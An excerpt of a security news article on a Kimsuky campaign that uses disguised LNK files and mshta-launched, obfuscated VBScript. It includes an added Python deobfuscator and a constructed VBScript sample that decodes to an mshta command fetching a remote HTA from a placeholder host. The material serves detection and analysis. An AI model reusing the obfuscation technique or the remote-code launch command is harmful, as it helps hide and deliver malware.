
Kimsuky APT Uses LNK Files to Deploy Reflective Malware and Evade Windows Defender


The North Korean state-sponsored group Kimsuky, also tracked as APT43, Thallium, and Velvet Chollima, has been attributed a recent cyber-espionage campaign in which malicious Windows shortcut (LNK) files served as the initial access vector against South Korean government agencies, defense contractors, and research institutions.

The operation begins with phishing emails carrying ZIP archives; each archive holds an LNK file whose name and icon are disguised to look like a legitimate document.

When the victim opens the shortcut, the LNK file launches mshta.exe with a remote URL, pulling an HTML Application (HTA) file from a Content Delivery Network (CDN). The HTA contains heavily obfuscated VBScript.

The script never stores its URLs or commands as plaintext. Instead it assembles them at run time from numeric character codes: decimal and hexadecimal (&H) values are converted with CLng and turned into single characters with Chr, then concatenated. Because the indicators only exist in memory after the script runs, static analysis and signature-based endpoint detection that look for literal strings in the file miss them.
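The string-building trick described above, as an added example (not code from the article, and not the group's actual script): a small Python pass that resolves VBScript Chr(...) calls whose argument is a decimal or &H hex literal, optionally wrapped in CLng(...), and folds each run of &-concatenated terms back into one plain string literal. The VBScript sample is constructed for this example and points at an invalid domain. Variable references (the u on the second line) are left unresolved, which is the limit of a purely lexical pass; anything that needs evaluation of the script's own logic belongs in an instrumented interpreter, not here.

```python
"""Fold VBScript Chr()/CLng() character-code concatenations back into literals.

Added example, not from the gbhackers article. SAMPLE_VBS below is constructed
to mimic the pattern the article describes; real samples will differ.
"""
import re
from typing import List

# One term of a concatenation: a Chr() call with a decimal or &H hex argument
# (optionally wrapped in CLng, with or without quotes), or a quoted literal.
_TERM_SRC = (
    r'(?:Chr\(\s*(?:CLng\(\s*"?(?:&H[0-9A-Fa-f]+|\d+)"?\s*\)|&H[0-9A-Fa-f]+|\d+)\s*\)'
    r'|"(?:[^"]|"")*")'
)
# A maximal run of terms joined by the VBScript & operator.
_RUN = re.compile(_TERM_SRC + r'(?:\s*&\s*' + _TERM_SRC + r')*', re.IGNORECASE)
# Same term grammar, with groups so each term can be decoded individually.
_TERM = re.compile(
    r'Chr\(\s*(?:CLng\(\s*"?(?P<inner>&H[0-9A-Fa-f]+|\d+)"?\s*\)|(?P<lit>&H[0-9A-Fa-f]+|\d+))\s*\)'
    r'|"(?P<str>(?:[^"]|"")*)"',
    re.IGNORECASE,
)
_URL = re.compile(r'https?://[^\s"\']+', re.IGNORECASE)


def _vb_int(tok: str) -> int:
    """Parse a VBScript integer literal: &H6D is hex, anything else decimal."""
    if tok[:2].upper() == "&H":
        return int(tok[2:], 16)
    return int(tok)


def decode_run(run: str) -> str:
    """Concatenate the characters and literals of one &-joined run."""
    parts = []
    for m in _TERM.finditer(run):
        if m.group("str") is not None:
            # VBScript escapes a quote inside a literal by doubling it.
            parts.append(m.group("str").replace('""', '"'))
        else:
            parts.append(chr(_vb_int(m.group("inner") or m.group("lit"))))
    return "".join(parts)


def deobfuscate(script: str) -> str:
    """Rewrite every Chr/CLng concatenation run in the script as a literal."""
    def repl(m: "re.Match[str]") -> str:
        return '"' + decode_run(m.group(0)).replace('"', '""') + '"'
    return _RUN.sub(repl, script)


def extract_urls(script: str) -> List[str]:
    """Return the URLs that only become visible after deobfuscation."""
    return _URL.findall(deobfuscate(script))


# Constructed sample: the URL and the mshta command are never present as text.
SAMPLE_VBS = (
    'Dim u, c\n'
    'u = Chr(CLng("&H68")) & Chr(CLng("&H74")) & Chr(116) & Chr(112) & '
    'Chr(CLng("&H73")) & "://" & Chr(CLng("&H63")) & Chr(100) & Chr(110) & '
    '".example.invalid/" & Chr(CLng("&H69")) & Chr(110) & Chr(100) & '
    'Chr(101) & Chr(120) & ".hta"\n'
    'c = Chr(109) & Chr(115) & Chr(104) & Chr(116) & Chr(97) & '
    'Chr(CLng("&H2E")) & "exe " & u\n'
)

if __name__ == "__main__":
    print(deobfuscate(SAMPLE_VBS))
    print(extract_urls(SAMPLE_VBS))
```

Running it prints the sample with both assignments collapsed to `u = "https://cdn.example.invalid/index.hta"` and `c = "mshta.exe " & u`, which is exactly the kind of indicator a static scanner would have needed to see in the original file. Extending the term grammar (ChrW, Mid, Replace, arithmetic inside CLng) is straightforward because every term is decoded by the same `decode_run` path.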

Sophisticated Infection Chain

According to the report, the malware then downloads a decoy PDF lure, such as repurposed South Korean government notices about sex offenders or tax penalties, to ...


This is an excerpt; the full story is published by gbhackers.